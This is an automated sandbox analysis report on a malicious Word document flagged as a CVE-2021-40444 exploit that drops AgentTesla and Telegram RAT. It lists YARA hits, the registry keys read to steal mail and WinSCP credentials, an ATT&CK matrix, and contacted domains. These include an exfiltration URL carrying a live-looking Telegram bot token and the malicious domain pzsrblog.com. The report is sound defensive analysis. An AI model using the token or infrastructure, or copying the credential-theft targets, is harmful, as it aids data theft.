Source: C:\Windows\SysWOW64\msdt.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: 19.2.PMoZbw.exe.3ee9510.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.PROMZwFp385vXrN.exe.3f6e020.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.PMoZbw.exe.3ee9510.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.PROMZwFp385vXrN.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.PROMZwFp385vXrN.exe.3f6e020.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000013.00000002.642900479.0000000003EE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.644029749.000000000411D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.581985407.0000000003F3D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.544511148.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PROMZwFp385vXrN.exe PID: 5444, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: PROMZwFp385vXrN.exe PID: 1788, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: PMoZbw.exe PID: 3300, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: 00000011.00000002.629534888.0000000003374000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.621651605.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PROMZwFp385vXrN.exe PID: 1788, type: MEMORYSTR

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe

Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities

Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Source: Yara match	File source: 00000011.00000002.622387434.0000000003114000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.621651605.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PROMZwFp385vXrN.exe PID: 1788, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: 19.2.PMoZbw.exe.3ee9510.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.PROMZwFp385vXrN.exe.3f6e020.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.PMoZbw.exe.3ee9510.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.PROMZwFp385vXrN.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.PROMZwFp385vXrN.exe.3f6e020.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000013.00000002.642900479.0000000003EE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.644029749.000000000411D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.581985407.0000000003F3D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.544511148.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PROMZwFp385vXrN.exe PID: 5444, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: PROMZwFp385vXrN.exe PID: 1788, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: PMoZbw.exe PID: 3300, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: 00000011.00000002.629534888.0000000003374000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.621651605.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PROMZwFp385vXrN.exe PID: 1788, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	211 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	1 Input Capture	2 File and Directory Discovery	Remote Services	11 Archive Collected Data	Exfiltration Over Other Network Medium	1 Web Service	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	1 Native API	1 Registry Run Keys / Startup Folder	111 Process Injection	1 Deobfuscate/Decode Files or Information	1 Credentials in Registry	114 System Information Discovery	Remote Desktop Protocol	1 Email Collection	Exfiltration Over Bluetooth	3 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	23 Exploitation for Client Execution	Logon Script (Windows)	1 Registry Run Keys / Startup Folder	3 Obfuscated Files or Information	Security Account Manager	1 Query Registry	SMB/Windows Admin Shares	1 Input Capture	Automated Exfiltration	11 Encrypted Channel	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	1 Command and Scripting Interpreter	Logon Script (Mac)	Logon Script (Mac)	13 Software Packing	NTDS	311 Security Software Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	3 Non-Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	1 Process Discovery	SSH	Keylogging	Data Transfer Size Limits	14 Application Layer Protocol	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	11 Masquerading	Cached Domain Credentials	141 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	141 Virtualization/Sandbox Evasion	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	111 Process Injection	Proc Filesystem	1 Remote System Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	1 Hidden Files and Directories	/etc/passwd and /etc/shadow	1 System Network Configuration Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Payment copy_2911022.docx.doc	41%	ReversingLabs	Document-Office.Exploit.CVE-2021-40444
Payment copy_2911022.docx.doc	46%	Virustotal		Browse
Payment copy_2911022.docx.doc	100%	Avira	EXP/CVE-2021-40444.Gen

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Roaming\PMoZbw\PMoZbw.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\PMoZbw\PMoZbw.exe	38%	ReversingLabs	ByteCode-MSIL.Trojan.Scarsi
C:\Windows\Temp\SDIAG_4fa3b06e-fc60-4be1-bad6-e51754719c96\DiagPackage.dll	0%	ReversingLabs
C:\Windows\Temp\SDIAG_4fa3b06e-fc60-4be1-bad6-e51754719c96\en-US\DiagPackage.dll.mui	0%	ReversingLabs

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
17.0.PROMZwFp385vXrN.exe.400000.0.unpack	100%	Avira	TR/Spy.Gen8		Download File

Domains

Source	Detection	Scanner	Label	Link
pzsrblog.com	2%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
https://cdn.entity.	0%	URL Reputation	safe
https://rpsticket.partnerservices.getmicrosoftkey.com	0%	URL Reputation	safe
http://www.fontbureau.comalsF	0%	URL Reputation	safe
https://api.aadrm.com/	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
https://res.getmicrosoftkey.com/api/redemptionevents	0%	URL Reputation	safe
https://officeci.azurewebsites.net/api/	0%	URL Reputation	safe
https://my.microsoftpersonalcontent.com	0%	URL Reputation	safe
https://store.office.cn/addinstemplate	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www	0%	URL Reputation	safe
https://www.odwebp.svc.ms	0%	URL Reputation	safe
https://api.addins.store.officeppe.com/addinstemplate	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
https://ncus.contentsync.	0%	URL Reputation	safe
https://wus2.contentsync.	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.carterandcone.com.	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
https://api.telegram.org4	0%	URL Reputation	safe
http://DynDns.comDynDNSnamejidpasswordPsi/Psi	0%	URL Reputation	safe
http://www.fontbureau.comrsiv	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
https://skyapi.live.net/Activity/	0%	URL Reputation	safe
https://api.cortana.ai	0%	URL Reputation	safe
https://staging.cortana.ai	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/jp/	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.fontbureau.comlicY=	0%	Avira URL Cloud	safe
http://wz5PFqmQeks9Nrk59.com	0%	Avira URL Cloud	safe
http://www.fontbureau.comd$=	0%	Avira URL Cloud	safe
http://www.tiro.K%	0%	Avira URL Cloud	safe
http://www.galapagosdesign.com/w=	0%	Avira URL Cloud	safe
http://www.galapagosdesign.com/staff/dennis.htm;	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/Y=	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/j=	0%	Avira URL Cloud	safe
http://www.fontbureau.comedta	0%	Avira URL Cloud	safe
http://www.monotype.s	0%	Avira URL Cloud	safe
http://www.fontbureau.com6=	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/jp/e=	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/e=	0%	Avira URL Cloud	safe
http://www.tiro.comf(	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/w=	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
pzsrblog.com	118.27.125.229	true	true	2%, Virustotal, Browse	unknown
api4.ipify.org	64.185.227.156	true	false		high
api.telegram.org	149.154.167.220	true	false		high
api.ipify.org	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.ipify.org/	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://shell.suite.office.com:1443	059BE406-184C-47DB-8766-13F9D87050E0.0.dr	false		high
http://www.galapagosdesign.com/w=	PROMZwFp385vXrN.exe, 0000000F.00000003.510115416.0000000005C24000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://autodiscover-s.outlook.com/	059BE406-184C-47DB-8766-13F9D87050E0.0.dr	false		high
http://www.jiyu-kobo.co.jp/j=	PROMZwFp385vXrN.exe, 0000000F.00000003.500643017.0000000005C28000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.501028952.0000000005C28000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.501470358.0000000005C28000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr	059BE406-184C-47DB-8766-13F9D87050E0.0.dr	false		high
https://cdn.entity.	059BE406-184C-47DB-8766-13F9D87050E0.0.dr	false	URL Reputation: safe	unknown
https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/	059BE406-184C-47DB-8766-13F9D87050E0.0.dr	false		high
https://rpsticket.partnerservices.getmicrosoftkey.com	059BE406-184C-47DB-8766-13F9D87050E0.0.dr	false	URL Reputation: safe	unknown
https://lookup.onenote.com/lookup/geolocation/v1	059BE406-184C-47DB-8766-13F9D87050E0.0.dr	false		high
http://www.fontbureau.com/designers	PROMZwFp385vXrN.exe, 0000000F.00000003.514679156.0000000005C5D000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.507511308.0000000005C5D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile	059BE406-184C-47DB-8766-13F9D87050E0.0.dr	false		high
http://www.fontbureau.comalsF	PROMZwFp385vXrN.exe, 0000000F.00000003.508657318.0000000005C26000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.507273478.0000000005C24000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.507759248.0000000005C24000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy	059BE406-184C-47DB-8766-13F9D87050E0.0.dr	false		high
https://api.telegram.org/bot5187914704:AAHhM5YfeLYR_Ow0fgwMOZKO7je7btbh5DA/1673982758%discordapi%yyy	PROMZwFp385vXrN.exe, 00000011.00000002.621651605.00000000030C1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.aadrm.com/	059BE406-184C-47DB-8766-13F9D87050E0.0.dr	false	URL Reputation: safe	unknown
http://www.fontbureau.comlicY=	PROMZwFp385vXrN.exe, 0000000F.00000003.506521208.0000000005C24000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.507273478.0000000005C24000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.507759248.0000000005C24000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://wz5PFqmQeks9Nrk59.com	PROMZwFp385vXrN.exe, 00000011.00000002.628798614.0000000003332000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies	059BE406-184C-47DB-8766-13F9D87050E0.0.dr	false		high
https://api.microsoftstream.com/api/	059BE406-184C-47DB-8766-13F9D87050E0.0.dr	false		high
https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive	059BE406-184C-47DB-8766-13F9D87050E0.0.dr	false		high
http://www.fontbureau.com/designers/frere-jones.htmlN	PROMZwFp385vXrN.exe, 0000000F.00000003.505106593.0000000005C5D000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.505144546.0000000005C5D000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.505189322.0000000005C5D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cr.office.com	059BE406-184C-47DB-8766-13F9D87050E0.0.dr	false		high
http://www.fontbureau.comd$=	PROMZwFp385vXrN.exe, 0000000F.00000003.507273478.0000000005C24000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.507759248.0000000005C24000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://www.galapagosdesign.com/DPlease	PROMZwFp385vXrN.exe, 0000000F.00000002.597253732.0000000006E22000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	PROMZwFp385vXrN.exe, 0000000F.00000002.597253732.0000000006E22000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	PROMZwFp385vXrN.exe, 00000011.00000002.621651605.00000000030C1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://res.getmicrosoftkey.com/api/redemptionevents	059BE406-184C-47DB-8766-13F9D87050E0.0.dr	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/Y=	PROMZwFp385vXrN.exe, 0000000F.00000003.501028952.0000000005C28000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.501470358.0000000005C28000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://tasks.office.com	059BE406-184C-47DB-8766-13F9D87050E0.0.dr	false		high
https://officeci.azurewebsites.net/api/	059BE406-184C-47DB-8766-13F9D87050E0.0.dr	false	URL Reputation: safe	unknown
https://my.microsoftpersonalcontent.com	059BE406-184C-47DB-8766-13F9D87050E0.0.dr	false	URL Reputation: safe	unknown
https://store.office.cn/addinstemplate	059BE406-184C-47DB-8766-13F9D87050E0.0.dr	false	URL Reputation: safe	unknown
https://messaging.engagement.office.com/	059BE406-184C-47DB-8766-13F9D87050E0.0.dr	false		high
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www	PROMZwFp385vXrN.exe, 00000011.00000002.621651605.00000000030C1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech	059BE406-184C-47DB-8766-13F9D87050E0.0.dr	false		high
https://www.odwebp.svc.ms	059BE406-184C-47DB-8766-13F9D87050E0.0.dr	false	URL Reputation: safe	unknown
https://api.powerbi.com/v1.0/myorg/groups	059BE406-184C-47DB-8766-13F9D87050E0.0.dr	false		high
https://web.microsoftstream.com/video/	059BE406-184C-47DB-8766-13F9D87050E0.0.dr	false		high
https://api.addins.store.officeppe.com/addinstemplate	059BE406-184C-47DB-8766-13F9D87050E0.0.dr	false	URL Reputation: safe	unknown
https://graph.windows.net	059BE406-184C-47DB-8766-13F9D87050E0.0.dr	false		high
http://www.carterandcone.coml	PROMZwFp385vXrN.exe, 0000000F.00000002.597253732.0000000006E22000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://consent.config.office.com/consentcheckin/v1.0/consents	059BE406-184C-47DB-8766-13F9D87050E0.0.dr	false		high
https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices	059BE406-184C-47DB-8766-13F9D87050E0.0.dr	false		high
https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json	059BE406-184C-47DB-8766-13F9D87050E0.0.dr	false		high
https://ncus.contentsync.	059BE406-184C-47DB-8766-13F9D87050E0.0.dr	false	URL Reputation: safe	unknown
https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/	059BE406-184C-47DB-8766-13F9D87050E0.0.dr	false		high
http://weather.service.msn.com/data.aspx	059BE406-184C-47DB-8766-13F9D87050E0.0.dr	false		high
http://api.telegram.org	PROMZwFp385vXrN.exe, 00000011.00000002.629483672.0000000003370000.00000004.00000800.00020000.00000000.sdmp	false		high
https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios	059BE406-184C-47DB-8766-13F9D87050E0.0.dr	false		high
http://www.tiro.K%	PROMZwFp385vXrN.exe, 0000000F.00000003.496556163.0000000005C21000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.496660729.0000000005C22000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://api.telegram.org/bot5187914704:AAHhM5YfeLYR_Ow0fgwMOZKO7je7btbh5DA/	PROMZwFp385vXrN.exe, 00000011.00000002.621651605.00000000030C1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml	059BE406-184C-47DB-8766-13F9D87050E0.0.dr	false		high
https://pushchannel.1drv.ms	059BE406-184C-47DB-8766-13F9D87050E0.0.dr	false		high
http://www.galapagosdesign.com/staff/dennis.htm;	PROMZwFp385vXrN.exe, 0000000F.00000003.509829844.0000000005C5D000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.509981461.0000000005C5D000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.509871998.0000000005C5D000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.510314930.0000000005C5D000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.510347822.0000000005C5D000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.509783839.0000000005C5D000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.510270514.0000000005C5D000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://wus2.contentsync.	059BE406-184C-47DB-8766-13F9D87050E0.0.dr	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn/bThe	PROMZwFp385vXrN.exe, 0000000F.00000002.597253732.0000000006E22000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://clients.config.office.net/user/v1.0/ios	059BE406-184C-47DB-8766-13F9D87050E0.0.dr	false		high
https://o365auditrealtimeingestion.manage.office.com	059BE406-184C-47DB-8766-13F9D87050E0.0.dr	false		high
https://outlook.office365.com/api/v1.0/me/Activities	059BE406-184C-47DB-8766-13F9D87050E0.0.dr	false		high
http://www.fontbureau.comedta	PROMZwFp385vXrN.exe, 0000000F.00000003.504476580.0000000005C24000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://clients.config.office.net/user/v1.0/android/policies	059BE406-184C-47DB-8766-13F9D87050E0.0.dr	false		high
https://entitlement.diagnostics.office.com	059BE406-184C-47DB-8766-13F9D87050E0.0.dr	false		high
https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json	059BE406-184C-47DB-8766-13F9D87050E0.0.dr	false		high
http://www.fontbureau.com6=	PROMZwFp385vXrN.exe, 0000000F.00000003.506521208.0000000005C24000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.508657318.0000000005C26000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.507273478.0000000005C24000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.507759248.0000000005C24000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://outlook.office.com/	059BE406-184C-47DB-8766-13F9D87050E0.0.dr	false		high
http://www.carterandcone.com.	PROMZwFp385vXrN.exe, 0000000F.00000003.497239392.0000000005C43000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/jp/e=	PROMZwFp385vXrN.exe, 0000000F.00000003.501028952.0000000005C28000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://storage.live.com/clientlogs/uploadlocation	059BE406-184C-47DB-8766-13F9D87050E0.0.dr	false		high
http://www.typography.netD	PROMZwFp385vXrN.exe, 0000000F.00000002.597253732.0000000006E22000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://fontfabrik.com	PROMZwFp385vXrN.exe, 0000000F.00000002.597253732.0000000006E22000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org4	PROMZwFp385vXrN.exe, 00000011.00000002.629483672.0000000003370000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.monotype.s	PROMZwFp385vXrN.exe, 0000000F.00000003.504305788.0000000005C5D000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://substrate.office.com/search/api/v1/SearchHistory	059BE406-184C-47DB-8766-13F9D87050E0.0.dr	false		high
http://DynDns.comDynDNSnamejidpasswordPsi/Psi	PROMZwFp385vXrN.exe, 00000011.00000002.621651605.00000000030C1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/e=	PROMZwFp385vXrN.exe, 0000000F.00000003.500643017.0000000005C28000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.501470358.0000000005C28000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://clients.config.office.net/c2r/v1.0/InteractiveInstallation	059BE406-184C-47DB-8766-13F9D87050E0.0.dr	false		high
http://www.fontbureau.comrsiv	PROMZwFp385vXrN.exe, 0000000F.00000003.507273478.0000000005C24000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.507759248.0000000005C24000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fonts.com	PROMZwFp385vXrN.exe, 0000000F.00000002.597253732.0000000006E22000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sandoll.co.kr	PROMZwFp385vXrN.exe, 0000000F.00000002.597253732.0000000006E22000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://graph.windows.net/	059BE406-184C-47DB-8766-13F9D87050E0.0.dr	false		high
https://devnull.onenote.com	059BE406-184C-47DB-8766-13F9D87050E0.0.dr	false		high
https://messaging.office.com/	059BE406-184C-47DB-8766-13F9D87050E0.0.dr	false		high
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing	059BE406-184C-47DB-8766-13F9D87050E0.0.dr	false		high
https://skyapi.live.net/Activity/	059BE406-184C-47DB-8766-13F9D87050E0.0.dr	false	URL Reputation: safe	unknown
http://www.tiro.comf(	PROMZwFp385vXrN.exe, 0000000F.00000003.496556163.0000000005C21000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.496660729.0000000005C22000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://api.cortana.ai	059BE406-184C-47DB-8766-13F9D87050E0.0.dr	false	URL Reputation: safe	unknown
https://messaging.action.office.com/setcampaignaction	059BE406-184C-47DB-8766-13F9D87050E0.0.dr	false		high
https://visio.uservoice.com/forums/368202-visio-on-devices	059BE406-184C-47DB-8766-13F9D87050E0.0.dr	false		high
https://staging.cortana.ai	059BE406-184C-47DB-8766-13F9D87050E0.0.dr	false	URL Reputation: safe	unknown
https://onedrive.live.com/embed?	059BE406-184C-47DB-8766-13F9D87050E0.0.dr	false		high
https://augloop.office.com	059BE406-184C-47DB-8766-13F9D87050E0.0.dr	false		high
http://www.jiyu-kobo.co.jp/jp/	PROMZwFp385vXrN.exe, 0000000F.00000003.500643017.0000000005C28000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.501028952.0000000005C28000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.501470358.0000000005C28000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.diagnosticssdf.office.com/v2/file	059BE406-184C-47DB-8766-13F9D87050E0.0.dr	false		high
https://prod.mds.office.com/mds/api/v1.0/clientmodeldirectory	059BE406-184C-47DB-8766-13F9D87050E0.0.dr	false		high
https://api.diagnostics.office.com	059BE406-184C-47DB-8766-13F9D87050E0.0.dr	false		high
http://www.fontbureau.com/designers/cabarga.htmlN	PROMZwFp385vXrN.exe, 0000000F.00000002.597253732.0000000006E22000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn	PROMZwFp385vXrN.exe, 0000000F.00000003.496449471.0000000005C42000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000002.597253732.0000000006E22000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.496074815.0000000005C1F000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.496494097.0000000005C43000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.496292759.0000000005C42000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.496697085.0000000005C43000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.496527277.0000000005C43000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/w=	PROMZwFp385vXrN.exe, 0000000F.00000003.501470358.0000000005C28000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.502412410.0000000005C23000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://store.office.de/addinstemplate	059BE406-184C-47DB-8766-13F9D87050E0.0.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
